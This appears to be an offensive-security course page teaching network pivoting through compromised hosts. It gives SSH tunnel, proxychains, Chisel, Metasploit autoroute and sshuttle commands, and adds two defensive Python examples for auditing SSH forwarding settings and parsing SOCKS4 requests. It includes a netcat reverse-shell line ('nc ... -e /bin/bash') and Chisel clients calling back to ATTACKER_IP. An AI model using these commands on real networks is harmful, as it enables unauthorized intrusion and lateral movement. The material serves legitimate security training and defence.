Network Pivoting

advanced · 40 min · Writeup

Moving laterally through compromised networks

Learning Objectives

  • Understand pivoting concepts
  • Set up SSH tunnels
  • Use proxychains
  • Pivot through Metasploit

You've compromised a machine, but the juicy targets are on internal networks you can't reach directly. Pivoting (also called "tunneling" or "lateral movement") lets you use compromised hosts as stepping stones to reach otherwise inaccessible systems.

Think of it like this: you've broken into the lobby of a building. The vault is in the basement, accessible only from inside. Pivoting lets you use that lobby computer to access the basement network.

Why Pivot?

Internal networks are often more trusted and less defended than perimeter systems. Once inside, pivoting lets you reach databases, domain controllers, and sensitive systems that aren't exposed to the internet.

Pivoting Concepts

  • Pivot Host: The compromised machine you route through
  • Local Port Forward: Access remote services via local port
  • Remote Port Forward: Expose your services on remote host
  • Dynamic Port Forward: SOCKS proxy for all traffic
  • Double Pivot: Chain through multiple hosts
```
# Network Topology Example
[Attacker]                          [Target Network]
192.168.1.5 --> [Pivot Host] --> 10.0.0.0/24
                 192.168.1.10       (Internal only)
                 10.0.0.1

# Without pivoting: Can't reach 10.0.0.x
# With pivoting: Route through pivot host to reach 10.0.0.x
```

SSH Tunneling

SSH tunneling is the most common pivoting method. If you have SSH access to the pivot host, you can tunnel almost anything through it.

Local Port Forwarding

"Bring remote port to me" - Access internal services locally.

```bash
# Access internal web server (10.0.0.5:80) via localhost:8080
ssh -L 8080:10.0.0.5:80 user@pivot_host

# Access internal RDP (10.0.0.10:3389)
ssh -L 3389:10.0.0.10:3389 user@pivot_host
# Then: rdesktop localhost

# Access internal MySQL
ssh -L 3306:10.0.0.20:3306 user@pivot_host
# Then: mysql -h 127.0.0.1 -u root -p

# Multiple forwards in one command
ssh -L 8080:10.0.0.5:80 -L 3389:10.0.0.10:3389 user@pivot_host
```

Dynamic Port Forwarding (SOCKS)

Create a SOCKS proxy for flexible routing.

```bash
# Create SOCKS proxy on local port 1080
ssh -D 1080 user@pivot_host

# Use with proxychains
echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT 10.0.0.0/24
proxychains curl http://10.0.0.5

# Use with browser
# Set Firefox SOCKS proxy: 127.0.0.1:1080

# Background the tunnel
ssh -D 1080 -f -N user@pivot_host
# -f = background, -N = no commands
```

Remote Port Forwarding

"Send my port there" - Expose your services through pivot.

```bash
# Make your local port 4444 accessible on pivot as port 4444
ssh -R 4444:localhost:4444 user@pivot_host

# Useful for reverse shells from internal network
# 1. Set up listener on your machine: nc -lvnp 4444
# 2. Create tunnel: ssh -R 4444:localhost:4444 user@pivot_host
# 3. From internal host: nc pivot_host 4444 -e /bin/bash
```

SSH Config for Persistence

Add tunnels to ~/.ssh/config for easy reuse:

```
Host pivot
  HostName 192.168.1.10
  User admin
  DynamicForward 1080
  LocalForward 8080 10.0.0.5:80
```
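The config above is the client side; the defender's counterpart is the server's sshd_config, where AllowTcpForwarding governs every -L, -R and -D tunnel and GatewayPorts (default no) keeps -R listeners on the pivot's loopback. This added example, not from the original page, audits a constructed sshd_config against those directives; it does not cover sshuttle, which carries traffic over the session's stdin/stdout rather than a port forward.

```python
"""Audit the sshd_config directives that let a host act as an SSH pivot.
Added example, not from the original page; the sample configs are constructed."""
import re

# OpenSSH defaults for the forwarding-related keywords (lower-cased).
DEFAULTS = {
    "allowtcpforwarding": "yes",  # required by -L, -R and -D
    "gatewayports": "no",         # yes would expose -R listeners beyond loopback
    "permittunnel": "no",         # -w tun/tap VPN tunnels
    "permitopen": "any",          # destinations -L/-D may connect to
}
# What a host that should never relay traffic ought to have.
HARDENED = {"allowtcpforwarding": "no", "gatewayports": "no",
            "permittunnel": "no", "permitopen": "none"}

def parse_global_directives(text):
    """Return ({keyword: value}, saw_match). sshd uses the FIRST occurrence
    of a keyword, so duplicates are ignored; keywords after the first Match
    block are skipped because they apply conditionally and need manual review."""
    directives, in_match = {}, False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)   # "Key value" or "Key=value"
        key, value = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")
        if key == "match":
            in_match = True
        elif not in_match and key not in directives:
            directives[key] = value
    return directives, in_match

def audit_forwarding(text):
    """List (keyword, effective_value, recommended_value) for every forwarding
    directive whose effective value differs from HARDENED."""
    directives, saw_match = parse_global_directives(text)
    findings = [(k, directives.get(k, DEFAULTS[k]).lower(), want)
                for k, want in HARDENED.items()
                if directives.get(k, DEFAULTS[k]).lower() != want]
    if saw_match:
        findings.append(("match", "present", "review Match blocks manually"))
    return findings

# Constructed samples: a typical default config, and the same with forwarding off.
SAMPLE_WEAK = "Port 22\nPermitRootLogin no\nGatewayPorts no\n"
SAMPLE_HARDENED = SAMPLE_WEAK + "AllowTcpForwarding no\nPermitTunnel no\nPermitOpen none\n"

if __name__ == "__main__":
    print("weak:", audit_forwarding(SAMPLE_WEAK))          # flags allowtcpforwarding, permitopen
    print("hardened:", audit_forwarding(SAMPLE_HARDENED))  # []
```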

Proxychains

Proxychains forces any TCP connection through your proxy. Essential for using tools that don't have native proxy support.

```bash
# Configure /etc/proxychains.conf
# Add at the end:
socks4 127.0.0.1 1080

# Or for multiple proxies (chain):
socks4 127.0.0.1 1080
socks4 127.0.0.1 1081

# Use with any tool
proxychains nmap -sT -Pn 10.0.0.5
proxychains curl http://10.0.0.5
proxychains ssh user@10.0.0.5
proxychains msfconsole

# For faster scanning
proxychains -q nmap -sT 10.0.0.0/24

# Note: Only TCP works through SOCKS
# No ICMP (ping), no UDP by default
```

Proxychains Limitations

Proxychains only works with dynamically linked programs and TCP. Nmap SYN scans (-sS) won't work - use TCP connect (-sT). Ping won't work - use -Pn to skip host discovery.
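To make the `socks4 127.0.0.1 1080` line and the TCP-only limitation from the Dynamic Port Forwarding and Proxychains sections concrete, here is an added example (not from the original page) that encodes and decodes the SOCKS4/4a CONNECT exchange proxychains performs against an `ssh -D` listener for every connection; the hostnames and bytes are constructed. The fixed 8-byte header is also what lets a defender recognise SOCKS4 traffic to an unexpected local listener.

```python
"""What travels through an `ssh -D` listener: the SOCKS4/4a CONNECT request
proxychains sends per TCP connection, and the server's reply.
Added example, not from the original page; all bytes are constructed."""
import ipaddress
import struct

SOCKS4_VERSION = 4
CMD_CONNECT = 1            # SOCKS4 defines only CONNECT and BIND: TCP only, no UDP
REPLY_GRANTED = 90         # 91-93 are rejection codes

def build_connect(host, port, userid=b""):
    """Encode a CONNECT. Dotted-quads fill the 4-byte DSTIP field; a hostname
    uses the SOCKS4a form (DSTIP = 0.0.0.x, name appended after USERID) so the
    proxy resolves it, which is what proxychains' proxy_dns option relies on."""
    try:
        dst_ip, suffix = ipaddress.IPv4Address(host).packed, b""
    except ipaddress.AddressValueError:
        dst_ip, suffix = b"\x00\x00\x00\x01", host.encode("ascii") + b"\x00"
    header = struct.pack("!BBH4s", SOCKS4_VERSION, CMD_CONNECT, port, dst_ip)
    return header + userid + b"\x00" + suffix

def parse_connect(data):
    """Decode a request to (host, port, userid); None if it is not a
    well-formed SOCKS4/4a CONNECT (e.g. SOCKS5 or plain HTTP bytes)."""
    if len(data) < 9 or data[0] != SOCKS4_VERSION or data[1] != CMD_CONNECT:
        return None
    port, raw_ip = struct.unpack("!H4s", data[2:8])
    userid, sep, tail = data[8:].partition(b"\x00")
    if not sep:
        return None
    if raw_ip[:3] == b"\x00\x00\x00" and raw_ip[3] != 0:   # SOCKS4a marker
        name, sep, _ = tail.partition(b"\x00")
        if not sep:
            return None
        host = name.decode("ascii")
    else:
        host = str(ipaddress.IPv4Address(raw_ip))
    return host, port, userid.decode("ascii")

def parse_reply(data):
    """Reply is 8 bytes: VN=0, CD, then port and IP (only meaningful for BIND).
    Returns True when the proxy granted the CONNECT."""
    if len(data) != 8 or data[0] != 0:
        raise ValueError("not a SOCKS4 reply")
    return data[1] == REPLY_GRANTED

if __name__ == "__main__":
    req = build_connect("10.0.0.5", 80)
    print(req.hex(), parse_connect(req))
```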

Chisel

Chisel is a fast TCP tunnel over HTTP. Perfect when SSH isn't available but HTTP traffic is allowed.

```bash
# On attacker (server mode)
./chisel server -p 8080 --reverse

# On pivot host (client mode)
./chisel client ATTACKER_IP:8080 R:socks

# This creates a SOCKS proxy on attacker:1080
# Use with proxychains same as SSH

# Port forward
./chisel client ATTACKER_IP:8080 R:8888:10.0.0.5:80

# Access internal web: curl localhost:8888
```

Metasploit Pivoting

```bash
# From meterpreter session
meterpreter > run autoroute -s 10.0.0.0/24

# Or manually
meterpreter > run post/multi/manage/autoroute SUBNET=10.0.0.0 NETMASK=255.255.255.0

# Check routes
meterpreter > run autoroute -p

# Now Metasploit can reach 10.0.0.x network
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.0.0.0/24
msf > run

# Create SOCKS proxy for external tools
msf > use auxiliary/server/socks_proxy
msf > set SRVPORT 1080
msf > run -j

# Then use proxychains with socks4 127.0.0.1 1080
```

Meterpreter Port Forward

```bash
# Forward local port to internal host
meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.5

# List forwards
meterpreter > portfwd list

# Remove forward
meterpreter > portfwd delete -l 8080 -p 80 -r 10.0.0.5
```

sshuttle

sshuttle creates a VPN-like connection over SSH. Easier than setting up tunnels for each port.

```bash
# Route all traffic to 10.0.0.0/24 through pivot
sshuttle -r user@pivot_host 10.0.0.0/24

# Multiple subnets
sshuttle -r user@pivot_host 10.0.0.0/24 10.1.0.0/24

# Route everything except local network
sshuttle -r user@pivot_host 0/0 -x 192.168.1.0/24

# With specific SSH key
sshuttle -r user@pivot_host 10.0.0.0/24 --ssh-cmd "ssh -i /path/to/key"
```

sshuttle is Magic

Unlike SOCKS proxies, sshuttle creates real routing rules. Tools work normally without proxychains. ICMP (ping) even works!

Double Pivoting

Sometimes you need to go through multiple hosts to reach your target. Chain proxies to extend your reach.

```bash
# Scenario:
# Attacker -> Pivot1 (192.168.1.10) -> Pivot2 (10.0.0.5) -> Target (172.16.0.0/24)

# Step 1: SOCKS proxy through Pivot1
ssh -D 1080 user@192.168.1.10

# Step 2: Use proxychains to SSH to Pivot2 and create second proxy
proxychains ssh -D 1081 user@10.0.0.5

# Step 3: Configure proxychains for double hop
# /etc/proxychains.conf:
# socks4 127.0.0.1 1080
# socks4 127.0.0.1 1081

# Now: proxychains curl http://172.16.0.10
```

Windows Pivoting

```bash
# Using netsh (built-in)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=10.0.0.5

# Using plink (PuTTY command line)
plink.exe -ssh -L 8080:10.0.0.5:80 user@pivot_host
plink.exe -ssh -D 1080 user@pivot_host

# Using chisel
chisel.exe client ATTACKER_IP:8080 R:socks
```

Pivoting Methodology

Pivoting Process

1. Network Recon: Identify internal subnets from the compromised host
2. Choose Method: SSH if available, Chisel for HTTP, Metasploit if a session exists
3. Establish Tunnel: Create a SOCKS proxy or port forwards
4. Configure Tools: Set up proxychains or native proxy settings
5. Scan Internal: Discover internal hosts and services
6. Exploit Internal: Attack internal targets through the pivot
7. Extend Access: Compromise additional hosts for further pivoting

Knowledge Check


What is the purpose of dynamic port forwarding (-D)?

Challenges

Basic Pivot

Challenge · 🔥 intermediate

From a compromised web server, access an internal database server (MySQL) that's only accessible from the web server's network.


Double Hop

Challenge · 💀 advanced

Access a target three networks deep: Internet -> DMZ -> Internal -> Secure. Set up tunnels to reach the secure network.


Key Takeaways

  • Pivoting routes traffic through compromised hosts to reach internal networks
  • SSH dynamic forwarding (-D) creates a versatile SOCKS proxy
  • Proxychains forces TCP connections through your proxy
  • sshuttle creates VPN-like routing over SSH
  • Chisel works over HTTP when SSH isn't available
  • Metasploit's autoroute enables routing through Meterpreter sessions
  • Double pivoting chains tunnels to reach deeply nested networks